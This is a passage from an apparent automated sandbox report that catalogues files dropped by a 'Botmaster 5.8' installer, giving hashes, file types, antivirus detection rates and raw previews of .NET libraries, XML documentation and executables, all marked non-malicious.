                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<doc>.. <assembly>.. <name>System.Runtime.CompilerServices.Unsafe</name>.. </assembly>.. <members>.. <member name="T:System.Runtime.CompilerServices.Unsafe">.. <summary>Contains generic, low-level functionality for manipulating pointers.</summary>.. </member>.. <member name="M:System.Runtime.CompilerServices.Unsafe.Add``1(``0@,System.Int32)">.. <summary>Adds an element offset to the given reference.</summary>.. <param name="source">The reference to add the offset to.</param>.. <param name="elementOffset">The offset to add.</param>.. <typeparam name="T">The type of reference.</typeparam>.. <returns>A new reference that reflects the addition of offset to pointer.</returns>.. </member>.. <member name="M:System.Runtime.CompilerServices.Unsafe.Add``1(``0@,System.IntPtr)">.. <summary>Adds an element offset to the given reference.</summary>.. <param name="source">The reference to add the of

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):76904
                                                                                                                                                                                                                Entropy (8bit):6.044596523315333
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:HOOuOOOoODVoXY9BnEf8uOxvW8hYEWroNFMRwkTuMd:VDGXmnEUuOx+8KEWrobMRzuq
                                                                                                                                                                                                                MD5:BA1AF3BBFF4D457B6D3F730234C3C701
                                                                                                                                                                                                                SHA1:1B75BC14DAA093502C7C5814852928E28AB6659A
                                                                                                                                                                                                                SHA-256:78EB5B4FEE580E163D1BEA1FDB7D371FDFCFD30ACD8708FF62C4372AAA219F7C
                                                                                                                                                                                                                SHA-512:51895C9B0EDE088B034C581AB4574A36F80E41F2B04186B3C066B6D72DA85680E00EA5E07DC9C89DB7D997C1AD3D9686ACCDC827859EAAB2918376C4C9E469B2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............v.... ... ....... .......................`............`.................................#...O.... ..................h$...@......8...T............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................W.......H........l..T...........0.................................................('...*..('...*..('...*^.('......7...%...}....*:.('.....}....*:.('.....}....*:.('.....}....*^.('......8...%...}....*:.('.....}....*.0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X((.....R...((.....d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X().... ...._.S...().....d.S*..0..&.........+....(*...G...Z.(......X....(+...2.*...0....................(+.....1...(+....Z.9.....(...+

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Encodings.Web.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (347), with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):62941
                                                                                                                                                                                                                Entropy (8bit):5.113786858273216
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Yc32SgYGYofQhYLJkiBkN3/Ky7pkG05HaTwoIIMZpq/YbTbBnRE1Cd8PBdl+Y0TE:Y9fJvkNxwoIIMZxE1Cr0Md3wh7te4
                                                                                                                                                                                                                MD5:ACC8AF8D28DC65488D1C49DEFD8EA153
                                                                                                                                                                                                                SHA1:1EECE92A2F2E40DE4AFB43F7A5CAEC9A3B384B87
                                                                                                                                                                                                                SHA-256:0772B7895A1FEA1D3BBEE2ED2F5200EF4F9EB38B22C3D00B5405325BE9D8A7CD
                                                                                                                                                                                                                SHA-512:452669AFF783AC248394838083695BD6CE45CB1B41FC512C7F3C7039D49D9E40C24F51A2255BAE3AC6F2E01388A54EC1F17092566CE808C70F3FC599ADA9734A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<doc>.. <assembly>.. <name>System.Text.Encodings.Web</name>.. </assembly>.. <members>.. <member name="T:System.Text.Encodings.Web.HtmlEncoder">.. <summary>Represents an HTML character encoding.</summary>.. </member>.. <member name="M:System.Text.Encodings.Web.HtmlEncoder.#ctor">.. <summary>Initializes a new instance of the <see cref="T:System.Text.Encodings.Web.HtmlEncoder" /> class.</summary>.. </member>.. <member name="M:System.Text.Encodings.Web.HtmlEncoder.Create(System.Text.Encodings.Web.TextEncoderSettings)">.. <summary>Creates a new instance of the HtmlEncoder class with the specified settings.</summary>.. <param name="settings">Settings that control how the <see cref="T:System.Text.Encodings.Web.HtmlEncoder" /> instance encodes, primarily which characters to encode.</param>.. <exception cref="T:System.ArgumentNullException">.. <paramref name="settings" /> is <see langword="null" />.<

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Json.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):513128
                                                                                                                                                                                                                Entropy (8bit):5.971511220770579
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12288:heoAhNgjkMq00CYjhlfKtgYytHVZ8kJ5LXrB+kSo/Y6dHC5tbRktxi/UE:hdAhNgjkMq00CYjhlfKtgYytHVZ8kJV4
                                                                                                                                                                                                                MD5:0894F9DB9EFAF98FF96625A7553806A4
                                                                                                                                                                                                                SHA1:19A983154516BB9542566B80F214AEC4657935DE
                                                                                                                                                                                                                SHA-256:E51AB157565C648CCDF3B003937FE991ABDD1A03E53A7E58BA1F6505097CB082
                                                                                                                                                                                                                SHA-512:27540D1F49D543C961DB74EE35C41575E0BB4AC7BBC1A6FADAAFA7509C819BEEE0DDA525CD3978141327043DDD63378EDA83FD9566DE9623D46847814D195B3F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............B.... ........... ....................... ............`....................................O.......................h$..............T............................................ ............... ..H............text...P.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................!.......H............>...........U...f............................................(H...*..(H...*..(H...*^.(H..........%...}....*:.(H.....}....*:.(H.....}....*:.(H.....}....*....0..E........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(I.....R...(I.....d.R*....0..K........ ...._.b..._X ....Y..e pp.._.d.X ....X.`.....X(J.... ...._.S...(J.....d.S*..0..&.........+....(K...G...Z.(......X....(L...2.*...0..............n.....(L.....1...(L....Z.......(...+.+...(L....Z........sN..............

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Json.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):457799
                                                                                                                                                                                                                Entropy (8bit):4.895083548380783
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:rKbxzXvvHMtFJWxEXjqM6xwFHibdBvYJgP4aqKiO6z0GYQYEu:VtFXjqNwFQ
                                                                                                                                                                                                                MD5:48DCE2A80E6612C98E895CCCFFDFDD06
                                                                                                                                                                                                                SHA1:6FC93E474AA32491BCB53A1A9DC1BC1C40B23F3A
                                                                                                                                                                                                                SHA-256:8499B6FFB77447FCB124DBFD0964E92267E14B3796A27FFC62A1B0FF04340575
                                                                                                                                                                                                                SHA-512:17FC851264162A29D3D36F6622A66DCD7CF435CDEE862DF86CDC0976357A126944775C538A5B8A25E9A385CE36C07EA73FE2BE5275EECF3C0F57044C063C2194
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<doc>.. <assembly>.. <name>System.Text.Json</name>.. </assembly>.. <members>.. <member name="T:System.Text.Json.JsonCommentHandling">.. <summary>Defines how the <see cref="T:System.Text.Json.Utf8JsonReader" /> struct handles comments.</summary>.. </member>.. <member name="F:System.Text.Json.JsonCommentHandling.Allow">.. <summary>Allows comments within the JSON input and treats them as valid tokens. While reading, the caller can access the comment values.</summary>.. </member>.. <member name="F:System.Text.Json.JsonCommentHandling.Disallow">.. <summary>Doesn't allow comments within the JSON input. Comments are treated as invalid JSON if found, and a <see cref="T:System.Text.Json.JsonException" /> is thrown. This is the default value.</summary>.. </member>.. <member name="F:System.Text.Json.JsonCommentHandling.Skip">.. <summary>Allows comments within the JSON input and ignores them. The <see cref="T

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Threading.Tasks.Extensions.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25984
                                                                                                                                                                                                                Entropy (8bit):6.291520154015514
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:1R973o62/KqcAnb05J3w0I5eUGef8s72XBWdvVW2JW8aJcyHRN7WEimpplex:1RZ4nNxnYTb6Blha
                                                                                                                                                                                                                MD5:E1E9D7D46E5CD9525C5927DC98D9ECC7
                                                                                                                                                                                                                SHA1:2242627282F9E07E37B274EA36FAC2D3CD9C9110
                                                                                                                                                                                                                SHA-256:4F81FFD0DC7204DB75AFC35EA4291769B07C440592F28894260EEA76626A23C6
                                                                                                                                                                                                                SHA-512:DA7AB8C0100E7D074F0E680B28D241940733860DFBDC5B8C78428B76E807F27E44D1C5EC95EE80C0B5098E8C5D5DA4D48BCE86800164F9734A05035220C3FF11
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..8...........V... ...`....... ....................................@..................................V..O....`...............B...#..........PU............................................... ............... ..H............text....6... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H........0...$...................T........................................(....*..(....z..(....z2.(....s....*2.(....s....*:........o....*.~....*~.-..(......}......}......}....*~.-..(......}......}......}....*Z..}......}......}....*J.{....%-.&.*o....*^.u....,........(....*.*~.{.....{....3..{.....{......*.*&...(....*2...(.......*....0..'........{......,..u....%-.&..(...+(....*(....*n.{....,..(....s....*.q....*..0..a.........{....o0.....,;..{....o2...(......;...3.~.......s......

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.Threading.Tasks.Extensions.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10147
                                                                                                                                                                                                                Entropy (8bit):4.891178331598223
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:1/elWY3f207pbNcYDLna8MMOOXzHMfHuHoLob+OoMuJkfYSiffiWje0seJme0seM:1/2d207pbNc2na8MMOOXzHMfHQoLob+N
                                                                                                                                                                                                                MD5:C89E735FCF37E76E4C3D7903D2111C04
                                                                                                                                                                                                                SHA1:3C0F1F09C188D8C74B42041004ECE59BBD6F0F56
                                                                                                                                                                                                                SHA-256:975A9555F561B363C3E02FD533F6BF7083AA11BBC7CBF2B46C31DF3D3696B97B
                                                                                                                                                                                                                SHA-512:DEBDD8D0ED2FF6AD7B175ACFEB1681B1A68EEEDD6D717E20E6AC5E0D11C13A1219B4D60F9319939C63BF4B53456328531369F4A9FFF5B201475858310E385007
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><doc>.. <assembly>.. <name>System.Threading.Tasks.Extensions</name>.. </assembly>.. <members>.. <member name="T:System.Runtime.CompilerServices.ValueTaskAwaiter`1">.. <typeparam name="TResult"></typeparam>.. </member>.. <member name="M:System.Runtime.CompilerServices.ValueTaskAwaiter`1.GetResult">.. <returns></returns>.. </member>.. <member name="P:System.Runtime.CompilerServices.ValueTaskAwaiter`1.IsCompleted">.. <returns></returns>.. </member>.. <member name="M:System.Runtime.CompilerServices.ValueTaskAwaiter`1.OnCompleted(System.Action)">.. <param name="continuation"></param>.. </member>.. <member name="M:System.Runtime.CompilerServices.ValueTaskAwaiter`1.UnsafeOnCompleted(System.Action)">.. <param name="continuation"></param>.. </member>.. <member name="T:System.Threading.Tasks.ValueTask`1">.. <summary>Provides a value type that wraps a <see cref="Task{TResult}"></see> and

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.ValueTuple.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25232
                                                                                                                                                                                                                Entropy (8bit):6.672539084038871
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:VyPa16oAL4D+wW9IWmDIW4IWYDMFm0GftpBjMIraQHRN7VlmTpF0:VWs6oqDjADKeDYViG+LN
                                                                                                                                                                                                                MD5:23EE4302E85013A1EB4324C414D561D5
                                                                                                                                                                                                                SHA1:D1664731719E85AAD7A2273685D77FEB0204EC98
                                                                                                                                                                                                                SHA-256:E905D102585B22C6DF04F219AF5CBDBFA7BC165979E9788B62DF6DCC165E10F4
                                                                                                                                                                                                                SHA-512:6B223CE7F580A40A8864A762E3D5CCCF1D34A554847787551E8A5D4D05D7F7A5F116F2DE8A1C793F327A64D23570228C6E3648A541DD52F93D58F8F243591E32
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.............b2... ...@....... ...............................H....@..................................2..O....@...............$...>...`......x1............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................B2......H........!..T....................0......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r[..p.(....*B.....(.........*.BSJB............v4.0.30319......l...4...#~..........#Strings....t.......#US.@.......

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\System.ValueTuple.xml

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):142
                                                                                                                                                                                                                Entropy (8bit):4.391770241438592
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:vFWWMNHUz6GbC/0tFFNu7WRtLz3hAbS9/FFNrGMH/xtgGM8Xby:TMV06GbSWVVR+SXNffgp8Xby
                                                                                                                                                                                                                MD5:B6E60687AE5DB6D011E21E6993620745
                                                                                                                                                                                                                SHA1:B117C6BBDDC72E7F4B590173992EE17BFDDE4BE1
                                                                                                                                                                                                                SHA-256:C37E163FA76629C196460C7B4D54E95B1A46A4C66AB7B6F3311959C8137DC5F1
                                                                                                                                                                                                                SHA-512:709212B6CB36F57B92A82DEF810F9C075A91B3E6A5FD330DCFB563D94A320783509441347D63BDE97F530C6B10CE6AA769CA11F7FC39ACF1B25D5C8F9DCBB389
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>System.ValueTuple</name>.. </assembly>.. <members>.. </members>..</doc>..

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\Uninstall.exe

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):119808
                                                                                                                                                                                                                Entropy (8bit):6.3234870718793195
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:NWmoWcZQfmGltwBiJWSIrRM7DcVfu7o4r:NWlWcZQfQisDKDcV27t
                                                                                                                                                                                                                MD5:7AE89C6074B7CF3D03081EA6616D873B
                                                                                                                                                                                                                SHA1:7294758911932FF6885521103BAF631ACBDA21BC
                                                                                                                                                                                                                SHA-256:AE326F86AA8BBB88831B0339C820859467EF910DADED5B430DC88DA97D203772
                                                                                                                                                                                                                SHA-512:B33EBAB1F4446CE2E339E1D9C6D781BAEB2104A97FF098DAE384FEDF98FC2FEB752B8231F1D33F0AAFBB757F48DA7BD7D1924FA0F8C2ED7A188A6AD984FB7C21
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t._S...............2.8...................`....@.....................................................................................D...........................................................................t................................code.../........................... ..`.text...`$...0...&.................. ..`.rdata.......`.......<..............@..@.data...xm.......d...X..............@....rsrc...D...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\app.publish\BotMaster.exe

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2941952
                                                                                                                                                                                                                Entropy (8bit):4.368119490757434
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12288:fhx7siRe9fEtTMd+8MIKJEz8Jfy5/uYSuwCV8YB09YnlzQ:fXDkxEtgc8PKuaCVHZl
                                                                                                                                                                                                                MD5:895F3A548FD8FA6FD1355AF6D218DA2C
                                                                                                                                                                                                                SHA1:F45065862543B4834B525AC235672D4B11F67EC9
                                                                                                                                                                                                                SHA-256:14A2312F1485E3B0ACD96127083BCA19DCA2988842DAE4928F7EDFE6CB2B47C4
                                                                                                                                                                                                                SHA-512:55DC3094822C57562C9761DC66B79799B5CFD1829AE81B82AE6AD5ECF545D1E5A11D7B522B182046FB98920D4CEE6E8106DB45ED8BFCF53FBEF6CF8AFE3EC774
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..d.........."...P..2(.........bP(.. ...`(...@.. .......................@-...........`..................................P(.O....`(.p.................... -......N(.............................................. ............... ..H............text...h0(.. ...2(................. ..`.rsrc...p....`(......4(.............@..@.reloc....... -.......,.............@..B................DP(.....H............................G...........................................0............("...(#.........(.....o$....*.....................(%......(&......('......((......()....*N..(....o....(*....*&..(+....*.s,........s-........s.........s/........s0........*....0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0..<........~.....(6.....,!r...p.....(7...o8...s9............~.....+..*.0......

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-arm64\native\WebView2Loader.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) Aarch64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):127912
                                                                                                                                                                                                                Entropy (8bit):6.024496413707989
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:FloHrOPzv4t1hmtcGXrGv8QitveGIsWLdgVWTF9EtzeW+CzX3i:FloH67v4tCe42G4gVWT/Et6WTbS
                                                                                                                                                                                                                MD5:0A21E14E0999C7E5AE8A74E6895AD694
                                                                                                                                                                                                                SHA1:F33769B32EF692360875347BFA5050FA69402617
                                                                                                                                                                                                                SHA-256:DAC2C67E5A21BA0A40A1A3ECDC9B7723708F10F5ECAB26F2DDB729C2E27396CA
                                                                                                                                                                                                                SHA-512:218D54CEE7ADC3A1C2578DF7BDEB95766EC97E602E3A381FE8E3DE5E33478FB9ECE71666DD4F1DB2416279F46A34B8BFDA5831930A2251256628162526B4A1E8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....'b.........." .................M.......................................0......f.....`A........................................i.......[...(............... ........#... ......L..........................(...01..8.......................`....................text...@........................... ..`.rdata.......0......................@..@.data...............................@....pdata.. ...........................@..@.00cfg..............................@..@.tls................................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x64\native\WebView2Loader.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):141224
                                                                                                                                                                                                                Entropy (8bit):6.131071018313368
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:JVl3u395AFm23fMZamo5Ha/9V8mgg2esFTGEtBnezYSi1g:lYAFmKyazpa/9JBEtUz7
                                                                                                                                                                                                                MD5:72CC22CBDEE3A60C042D0EACFAC7FED9
                                                                                                                                                                                                                SHA1:CBEFAAEA857FECD3EFC42E983B63F91F0FEF6F96
                                                                                                                                                                                                                SHA-256:184574B9C36B044888644FC1F2B19176E0E76CCC3DDD2F0A5F0D618C88661F86
                                                                                                                                                                                                                SHA-512:CBD49DDD2D9B613B439A5FC7426ABFF32678D358EC91271F50B525FDD382297538EA1C91CA74FF4390CCC8A4C4A2B617B77E318AD1F3042A3B41A4F4DE1AA258
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....'b.........." ..... ..........0D..............................................5h....`A....................................................(....`...................#...p......d...8.......................(....1..8...........`.......(...`....................text...5........ .................. ..`.rdata..|....0.......$..............@..@.data...............................@....pdata..............................@..@.00cfg..(.... ......................@..@.tls.........0......................@....voltbl.>....@.........................._RDATA.......P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x86\native\WebView2Loader.dll

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):110504
                                                                                                                                                                                                                Entropy (8bit):6.4357259807044045
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:UykiJ1Z1K95jvS8BBw/qZqocqQThEt9WSt6MlNMl:zkiHTMBBaNEtUS9lNMl
                                                                                                                                                                                                                MD5:CE8EAE228C99ECD86B3037288691D0B9
                                                                                                                                                                                                                SHA1:E3C45F525BADA976BED38C8A3E9492D6FF2FC9BC
                                                                                                                                                                                                                SHA-256:D493120AFE447E1BFE78B40FD0CEE82549009E39F999DA2F52B565DCDF69E7D5
                                                                                                                                                                                                                SHA-512:848751125F008722B4391DCAF71ECDAEB6456F007B2796D613F2F07B7F176F6697D62D18752DB0675AB70AD1E7C237C0B7655F553820D8309300BFE1B0E54886
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....'b.........."!................@>....................................................@A........................M_......?`..(........................#..........D\.......................Y......`................a..<....]..`....................text............................... ..`.rdata...n.......p..................@..@.data........p.......d..............@....00cfg...............n..............@..@.tls.................p..............@....voltbl.H............r...................rsrc................t..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\uninstall.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4617
                                                                                                                                                                                                                Entropy (8bit):5.063666968117584
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:e8lCMzCKDiIQlCLC7JCfCgqCBZCZVZGZRZ+Z5ZyZlZHjZHwZHdZHKZHHZH8ncv0w:LH+aM3QDoL8H1qf0ZdkUYa
                                                                                                                                                                                                                MD5:E5AE2B499F02906D83620661D0FCCECA
                                                                                                                                                                                                                SHA1:EADB379FF8C8130D54CA3B76EBB8DBEE7064D86B
                                                                                                                                                                                                                SHA-256:7F21A33C61C7BA001CDDD9B22D1C2AD08B6265F4848A5C2774A42E7231E956A3
                                                                                                                                                                                                                SHA-512:C71D03B6B6B867DAB561ADD820E601AF58717C00634022A6A7B934F85E06D4062DE50B277943E812B0AE5E6C4CEFEE0EDA9BAE5AADC030622548A188BB6DBA95
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....Bot Master..5.8....C:\Program Files (x86)\Bot Master\Bot Master\..9...#DF..C:\Program Files (x86)\Bot Master\Bot Master\app.publish\BotMaster.exe..#DF..C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.application..#DF..C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe..#DF..C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe.config..#DF..C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe.manifest..#DF..C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.pdb..#DF..C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.xml..#DF..C:\Program Files (x86)\Bot Master\Bot Master\Languages\English.json..#DF..C:\Program Files (x86)\Bot Master\Bot Master\Languages\Espa.ol.json..#DF..C:\Program Files (x86)\Bot Master\Bot Master\Languages\Fran.ais.json..#DF..C:\Program Files (x86)\Bot Master\Bot Master\Languages\indonesia.json..#DF..C:\Program Files (x86)\Bot Master\Bot Master\Languages\Portugu.s.json..#DF..C:\Program Files (x86)\Bot Master\Bot Master\Microso

                                                                                                                                                                                                                C:\Program Files (x86)\Bot Master\Bot Master\uninstall_l.ifl

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3006
                                                                                                                                                                                                                Entropy (8bit):4.906329518650122
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:KSH5mNWUm8/7UzY8Dmwwn0VYNv7TO4L/kpLlpfX9+XD/Vyx2IBGG+KX2ihd8rdpF:bZhUP/7UURn55Tf/ipX9+XrVmRtX38
                                                                                                                                                                                                                MD5:DC51022CF78C9B519F2058983A773119
                                                                                                                                                                                                                SHA1:56BF6AAE50122301617CDAA7C5002C38FA1571A1
